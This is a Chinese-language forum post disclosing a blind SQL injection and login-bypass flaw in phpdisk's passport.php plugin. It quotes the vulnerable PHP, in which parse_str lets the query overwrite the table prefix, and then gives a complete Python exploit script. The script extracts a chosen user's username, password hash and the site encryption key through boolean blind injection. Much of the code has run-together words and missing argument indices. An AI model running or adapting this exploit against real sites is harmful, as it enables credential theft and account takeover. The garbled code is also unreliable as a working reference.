phpdisk 盲注和前台任意用户登录漏洞附利用exp
文件 plugins\phpdisk_client\passport.php$str = $_SERVER['QUERY_STRING'];
if($str){
parse_str(base64_decode($str));// 触发函数
}else{
exit('Error Param');
}
/*$username = trim(gpc('username','G',''));
$password = trim(gpc('password','G',''));
$sign = trim(gpc('sign','G',''));*/
if($sign!=strtoupper(md5($action.$username.$password))){
exit('No data,Code:2!');
}
$username = is_utf8() ? convert_str('gbk','utf-8',$username) : $username;
if($action=='passportlogin'){
$rs = $db->fetch_one_array("select userid,gid,username,password,email from {$tpf}users where username='$username' and password='$password' limit 1");//覆盖tpf
phpdisk.py exploit
#===============================================================================
# Id :phpdisk.y
# Author:Yaseng
#===============================================================================
import sys, urllib2, time, os , Queue, msvcrt, threading,re,base64,md5,hashlib,binascii,cookielib
def cslogo():
print '''
____________________ __ __
/ __)/ _ \(_ \( ___)(_ \() /__\ ( \/ )
( (__( (_) ))(_) ))__))___/ )(__/(__)\ \/
\___)\___/(____/(____)(__)(____)(__)(__)(__)
Name:phpdisk bind sql injectionexploit
Author:Yaseng
Usage:phpdisk.pysite id
'''
# show message
def msg(text, type=0):
if type == 0:
str_def = "[*]"
eliftype == 1:
str_def = "[+]"
else:
str_def = "[-]";
print str_def + text;
# get url data
def get_data(url):
try:
r = urllib2.urlopen(url, timeout=10)
return r.read()
except :
return 0
def b(url):
if get_data(url).find("ssport Err",0) != -1 :
return 0
return 1
def make_plyload(payload):
return target+"?"+base64.b64encode("username=1&password=1&action=passportlogin&tpf="+payload+"&sign="+md5.new("passportlogin"+"1"+"1").hexdigest().upper())
def get_username():
msg("getusername ...")
globalpass_list
len=0
for i in range(40) :
ifb(make_plyload("pd_usersWHERE 1 and (SELECTLENGTH(username)frompd_users where userid=%d )= %d#" % (uid,i))):
len=i
msg("username length:%d" % len,1)
break
globalkey_list
key_list=['0','1','2','3','4','5','6','7','8','9']
key_list+=map(chr,range(97,123))
username=""
for iin range(len) :
for key in key_list :
t=key
if type(key) != int :
t="0x"+binascii.hexlify(key)
if(b(make_plyload(" pd_users WHERE 1 and (SELECTsubstr(username,%d,1) frompd_userswhere userid=%d )=%s #" % (i+1,uid,t)))) :
msg("username [%d]:%s" % (i+1,key))
username+=key
break
msg("username:"+username,1)
returnusername
def get_password():
pass_list=['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f']
password=""
for iin range(32) :
for key in pass_list :
t=key
if type(key) != int :
t="0x"+binascii.hexlify(key)
if(b(make_plyload(" pd_users WHERE 1 and (SELECTsubstr(password,%d,1) frompd_userswhere userid=%d )= %s #" % (i+1,uid,t)))) :
msg("password [%d]:%s" % (i+1,key))
password+=key
break
msg("username:"+password,1)
return password
def get_encrypt_key():
msg("get encrypt_key ...")
globalpass_list
pass_list=map(chr,range(97,123))
len=0
for i in range(40) :
ifb(make_plyload("pd_usersWHERE 1 and ( SELECTLENGTH(value)frompd_settingswhere vars=0x656e63727970745f6b6579 )=%d#23" % i)):
len=i
msg("encrypt_key length:%d" % len,1)
break
globalkey_list
key_list=['0','1','2','3','4','5','6','7','8','9']
key_list+=map(chr,range(65,91)+range(97,123))
encrypt_key=""
for iin range(len) :
for key in key_list :
t=key
if type(key) != int :
t="0x"+binascii.hexlify(key)
if(b(make_plyload(" pd_users WHERE 1 and ( SELECTbinary(substr(value,%d,1))frompd_settingswhere vars=0x656e63727970745f6b6579 )= %s #" % (i+1,t)))) :
msg("key [%d]:%s" % (i+1,key))
encrypt_key+=key
break
msg("encrypt_key:"+encrypt_key,1)
returnencrypt_key
if __name__ == '__main__':
cslogo()
if len(sys.argv) > 1 :
site=sys.argv;
global target
global uid
try :
uid=int(sys.argv);
except :
uid =1
target=site+"/plugins/phpdisk_client/passport.php"
msg("exploit:"+site)
#print get_data(make_plyload(" pd_users WHERE 1 and ( SELECTsubstr(value,2,1)frompd_settingswhere vars=0x656e63727970745f6b6579 )= 9 %23"))
if get_data(target) :
username=get_username()
if len(username) > 0 :
password=get_password()
if len(password) == 32 :
msg("Succeed: username:%spassword:%s" % (username,password),1)
else :
msg("vulnerabilitynotexits",2);
exit();
作者:yaseng
页:
[1]